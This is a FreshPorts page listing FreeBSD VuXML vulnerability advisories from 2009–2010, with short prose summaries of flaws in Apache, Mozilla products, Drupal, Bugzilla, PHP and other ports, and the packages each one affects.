This page displays vulnerability information about FreeBSD Ports.
The last vuln.xml file processed by FreshPorts is:
Revision: 1.2112 Date: 2010/02/08 Time: 16:38:40 Committer: skv
List all Vulnerabilities, by package
| VuXML entries as processed by FreshPorts | ||
|---|---|---|
| Date | Decscription | Port(s) |
| 2010-02-08 | OTRS Security Advisory reports: Missing security quoting for SQL statements allows agents and customers to manipulate SQL queries. So it's possible for authenticated users to inject SQL queries via string manipulation of statements. A malicious user may be able to manipulate SQL queries to read or modify records in the database. This way it could also be possible to get access to more permissions (e. g. administrator permissions). To use this vulnerability the malicious user needs to have a valid Agent- or Customer-session. more... | otrs |
| 2010-02-03* | Apache ChangeLog reports: Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow. more... | apache apache+ipv6 apache+mod_perl apache+mod_ssl apache+mod_ssl+ipv6 apache+mod_ssl+mod_accel apache+mod_ssl+mod_accel+ipv6 apache+mod_ssl+mod_accel+mod_deflate apache+mod_ssl+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_deflate apache+mod_ssl+mod_deflate+ipv6 apache+mod_ssl+mod_snmp apache+mod_ssl+mod_snmp+mod_accel apache+mod_ssl+mod_snmp+mod_accel+ipv6 apache+mod_ssl+mod_snmp+mod_accel+mod_deflate+ipv6 apache+mod_ssl+mod_snmp+mod_deflate apache+mod_ssl+mod_snmp+mod_deflate+ipv6 apache+ssl apache_fp ru-apache ru-apache+mod_ssl |
| 2010-02-02* | Squid security advisory 2010:1 reports: Due to incorrect data validation Squid is vulnerable to a denial of service attack when processing specially crafted DNS packets. This problem allows any trusted client or external server who can determine the squid receiving port to perform a short-term denial of service attack on the Squid service. more... | squid |
| 2010-02-01 | A Bugzilla Security Advisory reports: When moving a bug from one product to another, an intermediate page is displayed letting you select the groups the bug should be restricted to in the new product. However, a regression in the 3.4.x series made it ignore all groups which are not available in both products. As a workaround, you had to move the bug to the new product first and then restrict it to the desired groups, in two distinct steps, which could make the bug temporarily public. more... | bugzilla |
| 2010-01-28 | SecurityFocus reports: The first affects the /quote HELP module and allows a user to trigger an IRCD crash on some platforms. The second affects the /links processing module when the flatten_links configuration option is not enabled. more... | ircd-ratbox ircd-ratbox-devel |
| 2010-01-21* | Mozilla Porject reports: MFSA 2009-71 GeckoActiveXObject exception messages can be used to enumerate installed COM objects MFSA 2009-70 Privilege escalation via chrome window.opener MFSA 2009-69 Location bar spoofing vulnerabilities MFSA 2009-68 NTLM reflection vulnerability MFSA 2009-67 Integer overflow, crash in libtheora video library MFSA 2009-66 Memory safety fixes in liboggplay media library MFSA 2009-65 Crashes with evidence of memory corruption (rv:1.9.1.6/ 1.9.0.16) more... | firefox linux-firefox linux-seamonkey seamonkey thunderbird |
| 2010-01-18 | Dokuwiki reports: The plugin does no checks against cross-site request forgeries (CSRF) which can be exploited to e.g. change the access control rules by tricking a logged in administrator into visiting a malicious web site. The bug allows listing the names of arbitrary file on the webserver - not their contents. This could leak private information about wiki pages and server structure. more... | dokuwiki |
| 2010-01-11 | The Zend Framework team reports: Potential XSS or HTML Injection vector in Zend_Json. Potential XSS vector in Zend_Service_ReCaptcha_MailHide. Potential MIME-type Injection in Zend_File_Transfer Executive Summary. Potential XSS vector in Zend_Filter_StripTags when comments allowed. Potential XSS vector in Zend_Dojo_View_Helper_Editor. Potential XSS vectors due to inconsistent encodings. XSS vector in Zend_Filter_StripTags. LFI vector in Zend_View::setScriptPath() and render(). more... | ZendFramework |
| 2010-01-09 | PowerDNS Security Advisory reports: PowerDNS Recursor up to and including 3.1.7.1 can be brought down and probably exploited. PowerDNS Recursor up to and including 3.1.7.1 can be spoofed into accepting bogus data more... | powerdns-recursor |
| 2010-01-04 | PEAR Security Advisory reports: Multiple remote arbitrary command injections have been found in the Net_Ping and Net_Traceroute. When input from forms are used directly, the attacker could pass variables that would allow him to execute remote arbitrary command injections. more... | pear-Net_Ping pear-Net_Traceroute |
| 2009-12-25 | Drupal Team reports: The Contact module does not correctly handle certain user input when displaying category information. Users privileged to create contact categories can insert arbitrary HTML and script code into the contact module administration page. Such a cross-site scripting attack may lead to the malicious user gaining administrative access. The Menu module does not correctly handle certain user input when displaying the menu administration overview. Users privileged to create new menus can insert arbitrary HTML and script code into the menu module administration page. Such a cross-site scripting attack may lead to the malicious user gaining administrative access. more... | drupal5 drupal6 |
| 2009-12-21 | Denis Barov reports: sysutils/fuser allows user to send any signal to any process when installed with suid bit. more... | fuser |
| 2009-12-21 | Census Labs reports: We have discovered a remotely exploitable "improper input validation" vulnerability in the Monkey web server that allows an attacker to perform denial of service attacks by repeatedly crashing worker threads that process HTTP requests. more... | monkey |
| 2009-12-21* | Secunia reports: Some vulnerabilities have been reported in OpenSSL, which can be exploited by malicious people to cause a DoS. The library does not limit the number of buffered DTLS records with a future epoch. This can be exploited to exhaust all available memory via specially crafted DTLS packets. An error when processing DTLS messages can be exploited to exhaust all available memory by sending a large number of out of sequence handshake messages. more... | openssl |
| 2009-12-17 | PHP developers reports: This release focuses on improving the stability of the PHP 5.2.x branch with over 60 bug fixes, some of which are security related. All users of PHP 5.2 are encouraged to upgrade to this release. Security Enhancements and Fixes in PHP 5.2.12: Fixed a safe_mode bypass in tempnam() identified by Grzegorz Stachowiak. (CVE-2009-3557, Rasmus) Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz Stachowiak. (CVE-2009-3558, Rasmus) Added "max_file_uploads" INI directive, which can be set to limit the number of file uploads per-request to 20 by default, to prevent possible DOS via temporary file exhaustion, identified by Bogdan Calin. (CVE-2009-4017, Ilia) Added protection for $_SESSION from interrupt corruption and improved "session.save_path" check, identified by Stefan Esser. (CVE-2009-4143, Stas) Fixed bug #49785 (insufficient input string validation of htmlspecialchars()). (CVE-2009-4142, Moriyoshi, hello at iwamot dot com) more... | php5 |
| 2009-12-17 | PostgreSQL project reports: PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which (1) allows man-in-the-middle attackers to spoof arbitrary SSL-based PostgreSQL servers via a crafted server certificate issued by a legitimate Certification Authority, and (2) allows remote attackers to bypass intended client-hostname restrictions via a crafted client certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408. PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230. more... | postgresql-client postgresql-server |
| 2009-12-17 | SecurityFocus reports: TPTEST is prone to a remote stack-based buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. more... | tptest |
| 2009-12-14* | freeRADIUS Vulnerability Notifications reports: 2009.09.09 v1.1.7 - Anyone who can send packets to the server can crash it by sending a Tunnel-Password attribute in an Access-Request packet. This vulnerability is not otherwise exploitable. We have released 1.1.8 to correct this vulnerability. This issue is similar to the previous Tunnel-Password issue noted below. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is not affected. more... | freeradius |
| 2009-12-14* | Mozilla Foundation reports: MFSA 2009-64 Crashes with evidence of memory corruption (rv:1.9.1.4/ 1.9.0.15) MFSA 2009-63 Upgrade media libraries to fix memory safety bugs MFSA 2009-62 Download filename spoofing with RTL override MFSA 2009-61 Cross-origin data theft through document.getSelection() MFSA 2009-59 Heap buffer overflow in string to number conversion MFSA 2009-57 Chrome privilege escalation in XPCVariant::VariantDataToJS() MFSA 2009-56 Heap buffer overflow in GIF color map parser MFSA 2009-55 Crash in proxy auto-configuration regexp parsing MFSA 2009-54 Crash with recursive web-worker calls MFSA 2009-53 Local downloaded file tampering MFSA 2009-52 Form history vulnerable to stealing more... | firefox linux-firefox linux-seamonkey seamonkey |
| 2009-12-12 | secunia reports: Russ McRee has discovered some vulnerabilities in Pligg, which can be exploited by malicious people to conduct cross-site scripting and request forgery attacks. Input passed via the "Referer" HTTP header to various scripts (e.g. admin/admin_config.php, admin/admin_modules.php, delete.php, editlink.php, submit.php, submit_groups.php, user_add_remove_links.php, and user_settings.php) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create an arbitrary user with administrative privileges if a logged-in administrative user visits a malicious web site. more... | pligg |
| 2009-12-12* | Mozilla Foundation reports: MFSA 2009-32 JavaScript chrome privilege escalation MFSA 2009-31 XUL scripts bypass content-policy checks MFSA 2009-30 Incorrect principal set for file: resources loaded via location bar MFSA 2009-29 Arbitrary code execution using event listeners attached to an element whose owner document is null MFSA 2009-28 Race condition while accessing the private data of a NPObject JS wrapper class object MFSA 2009-27 SSL tampering via non-200 responses to proxy CONNECT requests MFSA 2009-26 Arbitrary domain cookie access by local file: resources MFSA 2009-25 URL spoofing with invalid unicode characters MFSA 2009-24 Crashes with evidence of memory corruption (rv:1.9.0.11) more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | Mozilla Foundation reports: MFSA 2009-22: Firefox allows Refresh header to redirect to javascript: URIs MFSA 2009-21: POST data sent to wrong site when saving web page with embedded frame MFSA 2009-20: Malicious search plugins can inject code into arbitrary sites MFSA 2009-19: Same-origin violations in XMLHttpRequest and XPCNativeWrapper.toString MFSA 2009-18: XSS hazard using third-party stylesheets and XBL bindings MFSA 2009-17: Same-origin violations when Adobe Flash loaded via view-source: scheme MFSA 2009-16: jar: scheme ignores the content-disposition: header on the inner URI MFSA 2009-15: URL spoofing with box drawing character MFSA 2009-14 Crashes with evidence of memory corruption (rv:1.9.0.9) more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | Mozilla Foundation reports: MFSA 2009-06: Directives to not cache pages ignored MFSA 2009-05: XMLHttpRequest allows reading HTTPOnly cookies MFSA 2009-04: Chrome privilege escalation via local .desktop files MFSA 2009-03: Local file stealing with SessionStore MFSA 2009-02: XSS using a chrome XBL method and window.eval MFSA 2009-01: Crashes with evidence of memory corruption (rv:1.9.0.6) more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | The Mozilla Foundation reports: MFSA 2008-37UTF-8 URL stack buffer overflow MFSA 2008-38nsXMLDocument::OnChannelRedirect() same-origin violation MFSA 2008-39Privilege escalation using feed preview page and XSS flaw MFSA 2008-40Forced mouse drag MFSA 2008-41Privilege escalation via XPCnativeWrapper pollution MFSA 2008-42Crashes with evidence of memory corruption (rv:1.9.0.2/1.8.1.17) MFSA 2008-43BOM characters stripped from JavaScript before execution MFSA 2008-44resource: traversal vulnerabilities MFSA 2008-45XBM image uninitialized memory reading more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | Mozilla Foundation reports: Fixes for security problems in the JavaScript engine described in MFSA 2008-15 introduced a stability problem, where some users experienced crashes during JavaScript garbage collection. This is being fixed primarily to address stability concerns. We have no demonstration that this particular crash is exploitable but are issuing this advisory because some crashes of this type have been shown to be exploitable in the past. more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2008-19 XUL popup spoofing variant (cross-tab popups) MFSA 2008-18 Java socket connection to any local port via LiveConnect MFSA 2008-17 Privacy issue with SSL Client Authentication MFSA 2008-16 HTTP Referrer spoofing with malformed URLs MFSA 2008-15 Crashes with evidence of memory corruption (rv:1.8.1.13) MFSA 2008-14 JavaScript privilege escalation and arbitrary code execution more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-12-12* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. Web forgery overwrite with div overlay URL token stealing via stylesheet redirect Mishandling of locally-saved plain text files File action dialog tampering Possible information disclosure in BMP decoder Web browsing history and forward navigation stealing Directory traversal via chrome: URI Stored password corruption Privilege escalation, XSS, Remote Code Execution Multiple file input focus stealing vulnerabilities Crashes with evidence of memory corruption (rv:1.8.1.12) more... | firefox flock linux-firefox linux-firefox-devel linux-flock linux-seamonkey linux-seamonkey-devel seamonkey |
| 2009-12-11 | secunia reports: Stefan Esser has reported a vulnerability in Piwik, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to the core/Cookie.php script using "unserialize()" with user controlled input. This can be exploited to e.g. execute arbitrary PHP code via the "__wakeup()" or "__destruct()" methods of a serialized object passed via an HTTP cookie. more... | piwik |
| 2009-12-10 | Dovecot author reports: Dovecot v1.2.x had been creating base_dir (and its parents if necessary) with 0777 permissions. The base_dir's permissions get changed to 0755 automatically at startup, but you may need to chmod the parent directories manually. more... | dovecot |
| 2009-12-09 | Adobe Product Security Incident Response Team reports: Critical vulnerabilities have been identified in Adobe Flash Player version 10.0.32.18 and earlier. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system. more... | linux-f10-flashplugin linux-f8-flashplugin linux-flashplugin |
| 2009-12-09 | The official ruby site reports: There is a heap overflow vulnerability in String#ljust, String#center and String#rjust. This has allowed an attacker to run arbitrary code in some rare cases. more... | ruby |
| 2009-12-09 | Secunia reports: A vulnerability has been reported in RT, which can be exploited by malicious people to conduct session fixation attacks. The vulnerability is caused due to an error in the handling of sessions and can be exploited to hijack another user's session by tricking the user into logging in after following a specially crafted link. more... | rt |
| 2009-12-08 | CVE reports: The updatePosition function in lib/xmltok_impl.c in libexpat in Expat 2.0.1, as used in Python, PyXML, w3c-libwww, and other software, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with crafted UTF-8 sequences that trigger a buffer over-read. more... | expat2 |
| 2009-12-08 | CVE reports: The big2_toUtf8 function in lib/xmltok.c in libexpat in Expat 2.0.1, as used in the XML-Twig module for Perl, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with malformed UTF-8 sequences that trigger a buffer over-read, related to the doProlog function in lib/xmlparse.c. more... | expat2 |
| 2009-12-01 | Opera Team reports: Fixed a heap buffer overflow in string to number conversion Fixed an issue where error messages could leak onto unrelated sites Fixed a moderately severe issue, as reported by Chris Evans of the Google Security Team; details will be disclosed at a later date. more... | linux-opera opera |
| 2009-11-28 | Secunia.com Do not attempt to load an unqualified module.la file from the current directory (by default) since doing so is insecure and is not compliant with the documentation. more... | libtool |
| 2009-11-24 | The Ubuntu security team reports: It was discovered that libvorbis did not correctly handle certain malformed vorbis files. If a user were tricked into opening a specially crafted vorbis file with an application that uses libvorbis, an attacker could cause a denial of service or possibly execute arbitrary code with the user's privileges. more... | libvorbis |
| 2009-11-23 | A Bugzilla Security Advisory reports: When a bug is in a group, none of its information (other than its status and resolution) should be visible to users outside that group. It was discovered that as of 3.3.2, Bugzilla was showing the alias of the bug (a very short string used as a shortcut for looking up the bug) to users outside of the group, if the protected bug ended up in the "Depends On" or "Blocks" list of any other bug. more... | bugzilla |
| 2009-11-23 | The cacti development team reports: The Cross-Site Scripting patch has been posted. This patch addresses cross-site scripting issues reported by Moritz Naumann. more... | cacti |
| 2009-11-14 | secunia reports: The security issue is caused due to the wp_check_filetype() function in /wp-includes/functions.php improperly validating uploaded files. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script with multiple extensions. Successful exploitation of this vulnerability requires that Apache is not configured to handle the mime-type for media files with an e.g. "gif", "jpg", "png", "tif", "wmv" extension. Input passed via certain parameters to press-this.php is not properly sanitised before being displayed to the user. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious data is being viewed. more... | de-wordpress wordpress |
| 2009-11-09* | CVE reports: The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. more... | gd php4-gd php5-gd |
| 2009-11-06 | CVE reports: The decode_entities function in util.c in HTML-Parser before 3.63 allows context-dependent attackers to cause a denial of service (infinite loop) via an incomplete SGML numeric character reference, which triggers generation of an invalid UTF-8 character. more... | p5-HTML-Parser |
| 2009-11-05 | TYPO3 develop team reports: Affected versions: TYPO3 versions 4.0.13 and below, 4.1.12 and below, 4.2.9 and below, 4.3.0beta1 and below. SQL injection, Cross-site scripting (XSS), Information disclosure, Frame hijacking, Remote shell command execution and Insecure Install Tool authentication/session handling. more... | typo3 |
| 2009-11-03 | VideoLAN reports: When parsing a MP4, ASF or AVI file with an overly deep box structure, a stack overflow might occur. It would overwrite the return address and thus redirect the execution flow. If successful, a malicious third party could trigger execution of arbitrary code within the context of the VLC media player. more... | vlc |
| 2009-11-02 | oCERT reports: Ark input sanitization errors: The KDE archiving tool, Ark, performs insufficient validation which leads to specially crafted archive files, using unknown MIME types, to be rendered using a KHTML instance, this can trigger uncontrolled XMLHTTPRequests to remote sites. IO Slaves input sanitization errors: KDE protocol handlers perform insufficient input validation, an attacker can craft malicious URI that would trigger JavaScript execution. Additionally the 'help://' protocol handler suffer from directory traversal. It should be noted that the scope of this issue is limited as the malicious URIs cannot be embedded in Internet hosted content. KMail input sanitization errors: The KDE mail client, KMail, performs insufficient validation which leads to specially crafted email attachments, using unknown MIME types, to be rendered using a KHTML instance, this can trigger uncontrolled XMLHTTPRequests to remote sites. The exploitation of these vulnerabilities is unlikely according to Portcullis and KDE but the execution of active content is nonetheless unexpected and might pose a threat. more... | kdebase4-runtime kdelibs4 |
| 2009-10-31 | Opera Team Reports: Fixed an issue where certain domain names could allow execution of arbitrary code, as reported by Chris Weber of Casaba Security Fixed an issue where scripts can run on the feed subscription page, as reported by Inferno more... | linux-opera opera |
| 2009-10-29* | Opera Team Reports: Issue where sites using revoked intermediate certificates might be shown as secure Issue where the collapsed address bar didn't show the current domain Issue where pages could trick users into uploading files Some IDNA characters not correctly displaying in the address bar Issue where Opera accepts nulls and invalid wild-cards in certificates more... | linux-opera opera opera-devel |
| 2009-10-28 | Securityfocus reports: cTorrent and dTorrent are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Successful exploits allow remote attackers to execute arbitrary machine code in the context of a vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions. more... | ctorrent |
| 2009-10-25 | SecurityFocus reports: ELinks is prone to an off-by-one buffer-overflow vulnerability because the application fails to accurately reference the last element of a buffer. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. more... | elinks |
| 2009-10-22* | SquidGuard website reports: Patch 20091015 fixes one buffer overflow problem in sgLog.c when overlong URLs are requested. SquidGuard will then go into emergency mode were no blocking occurs. This is not required in this situation. Patch 20091019 fixes two bypass problems with URLs which length is close to the limit defined by MAX_BUF (default: 4096) in squidGuard and MAX_URL (default: 4096 in squid 2.x and 8192 in squid 3.x) in squid. For this kind of URLs the proxy request exceeds MAX_BUF causing squidGuard to complain about not being able to parse the squid request. Increasing the buffer limit to be higher than the one defined in MAX_URL solves the issue. more... | squidGuard |
| 2009-10-20 | SecurityFocus reports: Some vulnerabilities have been reported in Xpdf, which can be exploited by malicious people to potentially compromise a user's system. 1) Multiple integer overflows in "SplashBitmap::SplashBitmap()" can be exploited to cause heap-based buffer overflows. 2) An integer overflow error in "ObjectStream::ObjectStream()" can be exploited to cause a heap-based buffer overflow. 3) Multiple integer overflows in "Splash::drawImage()" can be exploited to cause heap-based buffer overflows. 4) An integer overflow error in "PSOutputDev::doImageL1Sep()" can be exploited to cause a heap-based buffer overflow when converting a PDF document to a PS file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code by tricking a user into opening a specially crafted PDF file. more... | xpdf |
| 2009-10-16 | Django project reports: Django's forms library includes field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological performance case in these regular expression, resulting in the server process/thread becoming unresponsive, and consuming excessive CPU over an extended period of time. If deliberately triggered, this could result in an effectively denial-of-service attack. more... | py23-django py23-django-devel py24-django py24-django-devel py25-django py25-django-devel py26-django py26-django-devel py30-django py30-django-devel py31-django py31-django-devel |
| 2009-10-13 | phpMyAdmin Team reports: Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via a crafted MySQL table name. SQL injection vulnerability allows remote attackers to inject SQL via various interface parameters of the PDF schema generator feature. more... | phpMyAdmin phpMyAdmin211 |
| 2009-10-12 | Vendor reports Security Enhancements and Fixes in PHP 5.2.11: Fixed certificate validation inside php_openssl_apply_verification_policy. Fixed sanity check for the color index in imagecolortransparent. Added missing sanity checks around exif processing. Fixed bug 44683 popen crashes when an invalid mode is passed. more... | php5 |
| 2009-10-07 | Sun reports: A security vulnerability in the VBoxNetAdpCtl configuration tool for certain Sun VirtualBox 3.0 packages may allow local unprivileged users who are authorized to run VirtualBox to execute arbitrary commands with root privileges. more... | virtualbox |
| 2009-10-01* | oCERT reports: Pango suffers from a multiplicative integer overflow which may lead to a potentially exploitable, heap overflow depending on the calling conditions. For example, this vulnerability is remotely reachable in Firefox by creating an overly large document.location value but only results in a process-terminating, allocation error (denial of service). The affected function is pango_glyph_string_set_size. An overflow check when doubling the size neglects the overflow possible on the subsequent allocation. more... | linux-f10-pango linux-f8-pango linux-pango pango |
| 2009-09-30 | mybb team reports: Input passed via avatar extensions is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by uploading specially named avatars. The script allows to sign up with usernames containing zero width space characters, which can be exploited to e.g. conduct spoofing attacks. more... | mybb |
| 2009-09-22 | Drupal Team reports: The core OpenID module does not correctly implement Form API for the form that allows one to link user accounts with OpenID identifiers. A malicious user is therefore able to use cross site request forgeries to add attacker controlled OpenID identities to existing accounts. These OpenID identities can then be used to gain access to the affected accounts. The OpenID module is not a compliant implementation of the OpenID Authentication 2.0 specification. An implementation error allows a user to access the account of another user when they share the same OpenID 2.0 provider. File uploads with certain extensions are not correctly processed by the File API. This may lead to the creation of files that are executable by Apache. The .htaccess that is saved into the files directory by Drupal should normally prevent execution. The files are only executable when the server is configured to ignore the directives in the .htaccess file. Drupal doesn't regenerate the session ID when an anonymous user follows the one time login link used to confirm email addresses and reset forgotten passwords. This enables a malicious user to fix and reuse the session id of a victim under certain circumstances. more... | drupal5 drupal6 |
| 2009-09-22* | The Horde team reports: An error within the form library when handling image form fields can be exploited to overwrite arbitrary local files. An error exists within the MIME Viewer library when rendering unknown text parts. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site if malicious data is viewed. The preferences system does not properly sanitise numeric preference types. This can be exploited to execute arbitrary HTML and script code in a user's browser session in contact of an affected site. more... | horde-base |
| 2009-09-18 | Firewall Builder release notes reports: Vadim Kurland (vadim.kurland@fwbuilder.org) reports: Fwbuilder and libfwbuilder 3.0.4 through to 3.0.6 generate iptables scripts with a security issue when also used to generate static routing configurations. more... | fwbuilder |
| 2009-09-17 | A Bugzilla Security Advisory reports: It is possible to inject raw SQL into the Bugzilla database via the "Bug.create" and "Bug.search" WebService functions. When a user would change his password, his new password would be exposed in the URL field of the browser if he logged in right after changing his password. more... | bugzilla |
| 2009-09-15* | nginx development team reports: A segmentation fault might occur in worker process while specially crafted request handling. more... | nginx nginx-devel |
| 2009-09-14* | The Cyrus IMAP Server ChangeLog states: Fixed CERT VU#336053 - Potential buffer overflow in Sieve. more... | cyrus-imapd |
| 2009-09-13 | The IkiWiki development team reports: IkiWikis teximg plugin's blacklisting of insecure TeX commands is insufficient; it can be bypassed and used to read arbitrary files. more... | ikiwiki |
| 2009-09-13 | Olly Betts reports: There's a cross-site scripting issue in Omega - exception messages don't currently get HTML entities escaped, but can contain CGI parameter values in some cases. more... | xapian-omega |
| 2009-09-10 | Mozilla Foundation reports: MFSA 2009-51 Chrome privilege escalation with FeedWriter MFSA 2009-50 Location bar spoofing via tall line-height Unicode characters MFSA 2009-49 TreeColumns dangling pointer vulnerability MFSA 2009-48 Insufficient warning for PKCS11 module installation and removal MFSA 2009-47 Crashes with evidence of memory corruption (rv:1.9.1.3/1.9.0.14) more... | firefox |
| 2009-09-08 | SILC Changlog reports: An unspecified format string vulnerability exists in silc-toolkit. more... | silc-toolkit |
| 2009-09-04* | Mozilla Project reports: MFSA 2009-38: Data corruption with SOCKS5 reply containing DNS name longer than 15 characters MFSA 2009-42: Compromise of SSL-protected communication MFSA 2009-43: Heap overflow in certificate regexp parsing MFSA 2009-44: Location bar and SSL indicator spoofing via window.open() on invalid URL MFSA 2009-45: Crashes with evidence of memory corruption (rv:1.9.1.2/1.9.0.13) MFSA 2009-46: Chrome privilege escalation due to incorrectly cached wrapper more... | firefox linux-firefox linux-firefox-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird seamonkey thunderbird |
| 2009-09-02 | Simon Kelley reports: Fix security problem which allowed any host permitted to do TFTP to possibly compromise dnsmasq by remote buffer overflow when TFTP enabled. Fix a problem which allowed a malicious TFTP client to crash dnsmasq. more... | dnsmasq |
| 2009-08-25 | Apache ChangeLog reports: CVE-2009-1891: Fix a potential Denial-of-Service attack against mod_deflate or other modules. CVE-2009-1195: Prevent the "Includes" Option from being enabled in an .htaccess file if the AllowOverride restrictions do not permit it. CVE-2009-1890: Fix a potential Denial-of-Service attack against mod_proxy in a reverse proxy configuration. CVE-2009-1191: mod_proxy_ajp: Avoid delivering content from a previous request which failed to send a request body. CVE-2009-0023, CVE-2009-1955, CVE-2009-1956: The bundled copy of the APR-util library has been updated, fixing three different security issues which may affect particular configurations and third-party modules (was already fixed in 2.2.11_5). more... | apache |
| 2009-08-20 | Secunia reports: A vulnerability has been reported in Pidgin, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to an error in the "msn_slplink_process_msg()" function when processing MSN SLP messages and can be exploited to corrupt memory. Successful exploitation may allow execution of arbitrary code. The vulnerability is reported in versions 2.5.8 and prior. Other versions may also be affected. more... | finch libpurple pidgin |
| 2009-08-17 | SecurityFocus reports: GnuTLS is prone to multiple remote vulnerabilities: A remote code-execution vulnerability. A denial-of-service vulnerability. A signature-generation vulnerability. A signature-verification vulnerability. An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers. more... | gnutls gnutls-devel |
| 2009-08-17 | GnuTLS reports: By using a NUL byte in CN/SAN fields, it was possible to fool GnuTLS into 1) not printing the entire CN/SAN field value when printing a certificate and 2) cause incorrect positive matches when matching a hostname against a certificate. more... | gnutls gnutls-devel |
| 2009-08-17 | Secunia reports: A weakness has been reported in memcached, which can be exploited by malicious people to disclose system information. The weakness is caused due to the application disclosing the content of /proc/self/maps if a stats maps command is received. This can be exploited to disclose e.g. the addresses of allocated memory regions. more... | memcached |
| 2009-08-13* | WordPress reports: A specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. more... | de-wordpress wordpress wordpress-mu |
| 2009-08-13* | Matthias Andree reports: Moxie Marlinspike demonstrated in July 2009 that some CAs would sign certificates that contain embedded NUL characters in the Common Name or subjectAltName fields of ITU-T X.509 certificates. Applications that would treat such X.509 strings as NUL-terminated C strings (rather than strings that contain an explicit length field) would only check the part up to and excluding the NUL character, so that certificate names such as www.good.example\0www.bad.example.com would be mistaken as a certificate name for www.good.example. fetchmail also had this design and implementation flaw. more... | fetchmail |
| 2009-08-11* | Joomla! Security Center reports: In com_mailto, it was possible to bypass timeout protection against sending automated emails. more... | joomla15 |
| 2009-08-07* | A Subversion Security Advisory reports: Subversion clients and servers have multiple heap overflow issues in the parsing of binary deltas. This is related to an allocation vulnerability in the APR library used by Subversion. Clients with commit access to a vulnerable server can cause a remote heap overflow; servers can cause a heap overflow on vulnerable clients that try to do a checkout or update. This can lead to a DoS (an exploit has been tested) and to arbitrary code execution (no exploit tested, but the possibility is clear). more... | p5-subversion py-subversion subversion subversion-freebsd |
| 2009-08-07* | Mozilla Project reports: Firefox user zbyte reported a crash that we determined could result in an exploitable memory corruption problem. In certain cases after a return from a native function, such as escape(), the Just-in-Time (JIT) compiler could get into a corrupt state. This could be exploited by an attacker to run arbitrary code such as installing malware. This vulnerability does not affect earlier versions of Firefox which do not support the JIT feature. more... | firefox |
| 2009-08-06* | Squid security advisory 2009:2 reports: Due to incorrect buffer limits and related bound checks Squid is vulnerable to a denial of service attack when processing specially crafted requests or responses. Due to incorrect data validation Squid is vulnerable to a denial of service attack when processing specially crafted responses. These problems allow any trusted client or external server to perform a denial of service attack on the Squid service. Squid-2.x releases are not affected. more... | squid |
| 2009-08-05 | A Bugzilla Security Advisory reports: Normally, users are only supposed to see products that they can file bugs against in the "Product" drop-down on the bug-editing page. Instead, users were being shown all products, even those that they normally could not see. Any user who could edit any bug could see all product names. more... | bugzilla |
